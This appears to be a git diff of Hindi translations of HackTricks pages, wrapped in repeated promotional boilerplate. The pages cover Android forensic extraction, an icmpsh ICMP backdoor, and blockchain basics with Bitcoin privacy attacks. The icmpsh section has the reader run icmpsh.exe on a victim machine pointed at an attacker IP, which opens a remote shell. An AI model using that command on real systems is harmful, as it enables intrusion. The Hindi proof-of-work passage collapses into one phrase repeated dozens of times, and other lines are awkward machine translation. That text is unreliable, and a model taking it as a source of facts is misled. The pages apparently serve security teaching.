* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
</details> </details>
{% endhint %}
## Locked Device ## लॉक किया गया डिवाइस
एक Android डिवाइस से डेटा निकालना शुरू करने के लिए उसे अनलॉक होना चाहिए। अगर यह लॉक है तो आप: एक एंड्रॉइड डिवाइस से डेटा निकालने के लिए इसे अनलॉक किया जाना चाहिए। अगर यह लॉक है तो आप कर सकते हैं:
* जांचें कि क्या डिवाइस में USB के माध्यम से डिबगिंग सक्रिय है। * जांचें कि डिवाइस में USB के माध्यम से डीबगिंग सक्षम है।
* संभावित [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf) के लिए जांचें * [स्मज अटैक](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) के लिए जांच करें
* [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) के साथ प्रयास करें * [ब्रूट-फोर्स](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) के साथ प्रयास करें
## Data Adquisition ## डेटा अधिग्रहण
[android backup using adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) बनाएं और इसे [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/) का उपयोग करके निकालें: `java -jar abe.jar unpack file.backup file.tar` [adb का उपयोग करके एंड्रॉइड बैकअप बनाएं](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) और इसे [एंड्रॉइड बैकअप एक्सट्रैक्टर](https://sourceforge.net/projects/adbextractor/) का उपयोग करके निकालें: `java -jar abe.jar unpack file.backup file.tar`
### If root access or physical connection to JTAG interface ### यदि रूट एक्सेस या JTAG इंटरफेस के लिए फिजिकल कनेक्शन है
* `cat /proc/partitions` (फ्लैश मेमोरी के पथ की खोज करें, आमतौर पर पहली प्रविष्टि _mmcblk0_ होती है और यह पूरी फ्लैश मेमोरी के लिए होती है)। * `cat /proc/partitions` (फ्लैश मेमोरी का पथ खोजें, सामान्य रूप से पहला एंट्री _mmcblk0_ होती है और पूरी फ्लैश मेमोरी के लिए होती है)।
* `df /data` (सिस्टम के ब्लॉक साइज का पता लगाएं)। * `df /data` (सिस्टम का ब्लॉक साइज़ खोजें)।
* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (ब्लॉक साइज से एकत्रित जानकारी के साथ इसे निष्पादित करें)। * dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (इसे ब्लॉक साइज़ से जुटे जानकारी के साथ चलाएं)।
### Memory ### मेमोरी
Linux Memory Extractor (LiME) का उपयोग करके RAM जानकारी निकालें। यह एक कर्नेल एक्सटेंशन है जिसे adb के माध्यम से लोड किया जाना चाहिए। लिनक्स मेमोरी एक्सट्रैक्टर (LiME) का उपयोग करें रैम जानकारी निकालने के लिए। यह एक कर्नेल एक्सटेंशन है जो adb के माध्यम से लोड किया जाना चाहिए।
{% hint style="success" %}
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें द्वारा पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
</details> </details>
{% endhint %}

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
जीसीपी हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ</strong>!</summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
बैकडोर डाउनलोड करें: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) बैकडोर डाउनलोड करें: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
@ -29,22 +30,23 @@ IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
echo Please insert the IP where you want to listen echo Please insert the IP where you want to listen
read IP read IP
``` ```
# **शिकारक दल** # **शिकारी पक्ष**
**icmpsh.exe** को शिकारक के पास अपलोड करें और क्रियान्वित करें: शिकारी पक्ष पर **icmpsh.exe** अपलोड करें और क्रियान्वित करें:
```bash ```bash
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128 icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
``` ```
{% hint style="success" %}
**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**जीसीपी हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके हैकिंग ट्रिक्स साझा करें।
* [**आधिकारिक PEASS & HackTricks swag प्राप्त करें**](https://peass.creator-spring.com)
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,150 +1,144 @@
{% hint style="success" %}
सीखें और प्रैक्टिस AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापन दिखाए जाए** या **HackTricks को PDF में डाउनलोड** करें तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, **The PEASS Family** की खोज करें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
# मूलभूत शब्दावली ## मूल अवधारणाएँ
* **स्मार्ट कॉन्ट्रैक्ट**: स्मार्ट कॉन्ट्रैक्ट्स बेसिकली **ब्लॉकचेन पर स्टोर किए गए प्रोग्राम हैं जो निश्चित स्थितियों को पूरा होने पर चलते हैं**। वे सामान्यत: **एक समझौते** के **क्रियान्वयन** को स्वचालित करने के लिए उपयोग किए जाते हैं ताकि सभी सहभागियों को परिणाम के बारे में तुरंत पता चल सके, किसी मध्यस्थ की सहायता या समय की हानि के बिना। (से [यहाँ](https://www.ibm.com/topics/smart-contracts)). - **स्मार्ट कॉन्ट्रैक्ट्स** को उन कार्यक्रमों के रूप में परिभाषित किया जाता है जो ब्लॉकचेन पर कार्रवाई करते हैं जब कुछ शर्तें पूरी होती हैं, बिचौलियों के बिना समझौते की कार्रवाई को स्वचालित करना।
* मूल रूप से, एक स्मार्ट कॉन्ट्रैक्ट एक **कोड का टुकड़ा** है जो लोग जब उन्हें अनुबंध तक पहुंचते हैं तो क्रियान्वित होगा। स्मार्ट कॉन्ट्रैक्ट्स **ब्लॉकचेन में चलते हैं** (इसलिए परिणाम स्थायी रूप से स्टोर होते हैं) और लोग उन्हें स्वीकार करने से पहले पढ़ सकते हैं। - **डीसेंट्रलाइज्ड एप्लिकेशन्स (dApps)** स्मार्ट कॉन्ट्रैक्ट्स पर आधारित होते हैं, जिनमें एक उपयोगकर्ता-मित्रपूर्ण फ्रंट-एंड और एक पारदर्शी, जांचने योग्य बैक-एंड होता है।
* **डीएपी**: **डेसेंट्रलाइज्ड एप्लिकेशन** स्मार्ट कॉन्ट्रैक्ट्स के ऊपर लागू होते हैं। उनके पास एक फ्रंट-एंड होता है जहां उपयोगकर्ता एप्लिकेशन के साथ बातचीत कर सकते हैं, **बैक-एंड** सार्वजनिक होता है (ताकि इसे मूल्यांकन किया जा सके) और एक **स्मार्ट कॉन्ट्रैक्ट** के रूप में लागू किया जाता है। कभी-कभी डेटाबेस का उपयोग आवश्यक होता है, एथेरियम ब्लॉकचेन हर खाते को निश्चित संग्रह आवंटित करता है। - **टोकन और सिक्के** विभाजित करते हैं जहां सिक्के डिजिटल धन के रूप में काम करते हैं, जबकि टोकन विशेष संदर्भों में मूल्य या स्वामित्व को दर्शाते हैं।
* **टोकन और सिक्के**: एक **सिक्का** एक क्रिप्टोकरेंसी है जो **डिजिटल** **पैसे** के रूप में काम करता है और एक **टोकन** कुछ **मूल्य** का प्रतिनिधित्व करता है लेकिन यह एक सिक्का नहीं है। - **यूटिलिटी टोकन्स** सेवाओं तक पहुंचने की अनुमति देते हैं, और **सिक्योरिटी टोकन्स** संपत्ति के स्वामित्व को दर्शाते हैं।
* **यूटिलिटी टोकन्स**: ये टोकन उपयोगकर्ता को **बाद में कुछ सेवा तक पहुंचने** की अनुमति देते हैं (यह किसी विशिष्ट वातावरण में कुछ मूल्य वाली चीज है)। - **डीफाई** का मतलब है डीसेंट्रलाइज्ड फाइनेंस, जो केंद्रीय प्राधिकरणों के बिना वित्तीय सेवाएं प्रदान करता है।
* **सुरक्षा टोकन्स**: ये **स्वामित्व** या किसी संपत्ति का प्रतिनिधित्व करते हैं। - **डीएक्स** और **डीएओएस** डीसेंट्रलाइज्ड एक्सचेंज प्लेटफॉर्म और डीसेंट्रलाइज्ड ऑटोनोमस ऑर्गनाइजेशन्स को संदर्भित करते हैं।
* **डीफाई**: **डेसेंट्रलाइज्ड फाइनेंस**
* **डीईएक्स: डेसेंट्रलाइज्ड एक्सचेंज प्लेटफॉर्म्स**
* **डीएओएस**: **डेसेंट्रलाइज्ड ऑटोनोमस ऑर्गनाइजेशन्स**
# सहमति तंत्र ## सहमति तंत्र
एक ब्लॉकचेन लेनदारी को मान्य करने के लिए, इसे **ब्लॉकचेन** में **जोड़ना** होगा। मान्यकर्ता (खान संचालक) इस जोड़ने का कार्य करते हैं; अधिकांश प्रोटोकॉल में, वे इसे करने के लिए **पुरस्कार प्राप्त** करते हैं। ब्लॉकचेन को सुरक्षित रखने के लिए, इसे **एक दुर्भाग्यपूर्ण उपयोगकर्ता या समूह से बड़ी संख्या में मान्यता प्राप्त करने से रोकने का एक तंत्र होना चाहिए** सहमति तंत्र सुनिश्चित करते हैं और ब्लॉकचेन पर सुरक्षित और स्वीकृत लेन-देन की पुष्टि करते हैं:
- **प्रूफ ऑफ वर्क (PoW)** लेन-देन सत्यापन के लिए कंप्यूटेशनल पावर पर निर्भर होता है।
- **प्रूफ ऑफ स्टेक (PoS)** वैधकों से निश्चित मात्रा में टोकन रखने की मांग करता है, जो PoW की तुलना में ऊर्जा खपत को कम करता है।
प्रूफ ऑफ वर्क, एक और सामान्यत: उपयोग किया जाने वाला सहमति तंत्र, सौजन्य की मान्यता की जांच के लिए गणना क्षमता की मान्यता का उपयोग करता है, जिसमें एक संभावित हमलावर को वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वै ## बिटकॉइन महत्वपूर्ण अंश
```
### लेन-देन
बिटकॉइन लेन-देन में फंड ट्रांसफर शामिल होते हैं। लेन-देन डिजिटल हस्ताक्षरों के माध्यम से सत्यापित होते हैं, सुनिश्चित करते हैं कि केवल निजी कुंजी के मालिक ही स्थानांतरण प्रारंभ कर सकता है।
#### मुख्य घटक:
- **मल्टीसाइनेचर लेन-देन** को एक लेन-देन को अधिक संकेतों की आवश्यकता होती है अनुमति देने के लिए।
- लेन-देन में **इनपुट्स** (फंड का स्रोत), **आउटपुट्स** (गंतव्य), **शुल्क** (खनिजों को दिया जाता है), और **स्क्रिप्ट्स** (लेन-देन नियम) शामिल होते हैं।
### लाइटनिंग नेटवर्क
बिटकॉइन की स्कैलेबिलिटी को बढ़ाने का उद्देश्य एक चैनल के भीतर कई लेन-देनों की अनुमति देना है, केवल अंतिम स्थिति को ब्लॉकचेन पर प्रसारित करना।
## बिटकॉइन गोपनीयता चिंताएँ
गोपनीयता हमले, जैसे कि **सामान्य इनपुट स्वामित्व** और **यूटीएक्सओ चेंज एड्रेस डिटेक्शन**, लेन-देन पैटर्न का शोषण करते हैं। **मिक्सर्स** और **कॉइनजॉइन** जैसी रणनीतियाँ उपयोगकर्ताओं के बीच लेन-देन लिंक को अस्पष्ट करके गोपनीयता को बेहतर बनाती हैं।
## बिटकॉइन गोपनीयता हमले
# बिटकॉइन गोपनीयता हमलों का सारांश
बिटकॉइन के विश्व में, लेन-देनों की गोपनीयता और उपयोगकर्ताओं की गुमनामी अक्सर चिंता के विषय होते हैं। यहाँ कुछ सामान्य विधियाँ हैं जिनके माध्यम से हमलावर बिटकॉइन गोपनीयता को कमजोर कर सकते हैं।
## **सामान्य इनपुट स्वामित्व मान्यता**
सामान्य रूप से विभिन्न उपयोगकर्ताओं से आयात एक ही लेन-देन में मिलाया जाना अत्यधिक असाधारण होता है क्योंकि इसमें जटिलता शामिल होती है। इसलिए, **एक ही लेन-देन में दो इनपुट पते अक्सर एक ही मालिक के होने का अनुमान किया जाता है**
## **यूटीएक्सओ चेंज एड्रेस डिटेक्शन**
एक यूटीएक्सओ, या **अनखर्चित लेन-देन आउटपुट**, को एक लेन-देन में पूरी तरह से खर्च किया जाना चाहिए। अगर इसमें से केवल एक हिस्सा किसी अन्य पते पर भेजा जाता है, तो शेष नये चेंज एड्रेस पर जाता है। दर्शक इस नए पते को भेजने वाले का मानते हैं, जिससे गोपनीयता को खतरे में डाला जा सकता है।
### उदाहरण
```bash
2 btc --> 4 btc 2 btc --> 4 btc
3 btc 1 btc 3 btc 1 btc
``` ```
मानते हैं कि उत्पादों में से एक चेंज है और दूसरा उत्पाद भुगतान है। दो व्याख्यान हैं: भुगतान उत्पाद या 4 BTC उत्पाद है या 1 BTC उत्पाद है। लेकिन अगर 1 BTC उत्पाद भुगतान राशि है तो 3 BTC इनपुट अनावश्यक है, क्योंकि वॉलेट केवल 2 BTC इनपुट खर्च कर सकती थी और इसे करने के लिए कम माइनर शुल्क भुगत सकती थी। यह एक संकेत है कि वास्तविक भुगतान उत्पाद 4 BTC है और 1 BTC चेंज उत्पाद है। ## **बाध्य पता पुनः उपयोग**
यह वह समस्या है जिसके लिए लेनदार अधिक से अधिक इनपुट होते हैं। इस लीक को ठीक करने का एक तरीका यह है कि चेंज उत्पाद किसी भी इनपुट से अधिक होने तक अधिक इनपुट जोड़ें, उदाहरण के लिए: हमलावार छोटी मात्रा में पहले से उपयोग किए गए पतों पर धन भेज सकते हैं, आशा है कि प्राप्तकर्ता भविष्य की लेन-देन में इन्हें अन्य इनपुट के साथ मिला दें, जिससे पते को एक साथ जोड़ा जा सके।
```
2 btc --> 4 btc
3 btc 6 btc
5 btc
```
## मजबूर पता पुनरउपयोग
**मजबूर पता पुनरउपयोग** या **प्रोत्साहित पता पुनरउपयोग** एक प्रकार की है जब एक प्रतिकूल व्यक्ति ब्लॉक श्रृंखला पर पहले से ही उपयोग किए गए पतों को बिटकॉइन की एक (अक्सर छोटी) राशि देता है। दुश्मन उम्मीद करता है कि उपयोगकर्ता या उनका वॉलेट सॉफ्टवेयर **भुगतान को एक बड़े लेन-देन के लिए इनपुट के रूप में उपयोग करेगा जिससे सामान्य-इनपुट-स्वामित्व** नियमानुसार अन्य पतों को प्रकट करेगा। ये भुगतान अप्रत्याशित पता पुनरउपयोग में पता मालिक को मनोबलित पता पुनरउपयोग के रूप में समझा जा सकता है। ### सही वॉलेट व्यवहार
इस गोपनीयता लीक को रोकने के लिए वॉलेट को खाली पतों पर प्राप्त किए गए सिक्कों का उपयोग न करना चाहिए।
यह हमला कभी-कभी गलती से **धूल अटैक** कहलाता है। ## **अन्य ब्लॉकचेन विश्लेषण तकनीकें**
वॉलेट्स द्वारा सही व्यवहार यह है कि खाली पतों पर जमी मुद्रा को खर्च न करें। - **सटीक भुगतान राशियाँ:** बिना परिवर्तन के लेन-देन एक उपयोगकर्ता द्वारा स्वामित्व में होने की संभावना है।
- **गोल नंबर:** एक लेन-देन में गोल नंबर एक भुगतान का सुझाव देता है, जिसमें गोल आउटपुट संभावित रूप से परिवर्तन होता है।
- **वॉलेट फिंगरप्रिंटिंग:** विभिन्न वॉलेट्स के अद्वितीय लेन-देन निर्माण पैटर्न होते हैं, जिससे विश्लेषक सॉफ़्टवेयर का पता लगा सकते हैं और संभावित रूप से परिवर्तन पता लगा सकते हैं।
- **राशि और समय संबंध:** लेन-देन के समय या राशि का खुलासा करना लेन-देन को ट्रेसेबल बना सकता है।
## अन्य ब्लॉकचेन विश्लेषण ## **ट्रैफिक विश्लेषण**
* **सटीक भुगतान राशियाँ**: परिवर्तन के साथ लेन-देन से बचने के लिए, भुगतान को UTXO के बराबर होना चाहिए (जो अत्यधिक अपेक्षित है)। इसलिए, एक **भुगतान जिसमें कोई परिवर्तन पता नहीं है, संभावित रूप से एक ही उपयोगकर्ता के 2 पतों के बीच स्थानांतरण है** नेटवर्क ट्रैफिक का मॉनिटरिंग करके हमलावर लेन-देन या ब्लॉक को आईपी पतों से जोड़ सकते हैं, उपयोगकर्ता गोपनीयता को कमजोर करते हैं। यह विशेष रूप से सत्य है अगर कोई संस्था बहुत सारे बिटकॉइन नोड चलाती है, जिससे उनकी लेन-देनों को मॉनिटर करने की क्षमता बढ़ जाती है।
* **गोल नंबर**: एक लेन-देन में, यदि आउटपुट में से एक "**गोल नंबर**" है, तो यह उचित है कि यह एक **इंसान को भुगतान करने के लिए जो उसने वह** "गोल नंबर" **मूल्य** डाला है, इसलिए अन्य हिस्सा बचा होना चाहिए।
* **वॉलेट फिंगरप्रिंटिंग:** एक सावधान विश्लेषक कभी-कभी यह निर्धारित कर सकता है कि कौन सा सॉफ्टवेयर किस लेन-देन को बनाया, क्योंकि **कई विभिन्न वॉलेट सॉफ्टवेयर हमेशा बिल्कुल एक ही तरीके से लेन-देन नहीं करते**। वॉलेट फिंगरप्रिंटिंग का उपयोग परिवर्तन आउटपुट का पता लगाने के लिए किया जा सकता है क्योंकि एक परिवर्तन आउटपुट वह है जिसे एक ही वॉलेट फिंगरप्रिंट के साथ खर्च किया गया है।
* **राशि और समय संबंध**: यदि व्यक्ति जिसने लेन-देन किया है **समय** और/या **राशि** का खुलासा करता है, तो इसे आसानी से **खोजा जा सकता है**
## ट्रैफिक विश्लेषण ## अधिक
गोपनीयता हमलों और रक्षा की व्यापक सूची के लिए, [बिटकॉइन गोपनीयता पर बिटकॉइन विकि](https://en.bitcoin.it/wiki/Privacy) पर जाएं।
कुछ संगठन **आपके ट्रैफिक को स्निफ करते** हुए आपको बिटकॉइन नेटवर्क में संचार करते हुए देख सकते हैं।\ ```plaintext
यदि प्रतिकूल एक लेन-देन या ब्लॉक देखता है **जो आपके नोड से निकल रहा है जिससे पहले नहीं आया था**, तो यह निश्चितता के साथ जान सकता है कि **लेन-देन आपके द्वारा किया गया था या ब्लॉक आपके द्वारा खनित हुआ था**। इंटरनेट कनेक्शन शामिल होने के कारण, प्रतिकूल व्यक्ति को खोजने में सक्षम होगा कि खोजे गए बिटकॉइन सूचना के साथ IP पता को जोड़ सकता है।
एक हमलावर जो सभी इंटरनेट ट्रैफिक को स्निफ नहीं कर सकता है लेकिन जिसके पास **बहुत सारे बिटकॉइन नोड** होते हैं ताकि वह **स्रोतों के करीब रह सके**, वह जान सकता है कि कौन से IP पते लेन-देन या ब्लॉक की घोषणा कर रहे हैं।\
इसके अलावा, कुछ वॉलेट समय-समय पर अपुष्ट लेन-देन को फिर से प्रसारित करते हैं ताकि वे नेटवर्क में व्यापक रूप से प्रसारित होने और खनित होने की अधिक संभावना हो।
## पतों के मालिक के बारे में जानकारी प्राप्त करने के लिए अन्य हमले
अधिक हमलों के लिए पढ़ें [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy)
# अनाम बिटकॉइन
## बिटकॉइन गुमनामता से प्राप्त करना
* **नकद व्यापार:** नकद का उपयोग करके बिटकॉइन खरीदें।
* **नकद के समर्थक:** गिफ्ट कार्ड या समान क्रय करें और उन्हें ऑनलाइन बिटकॉइन के लिए विनिमय करें।
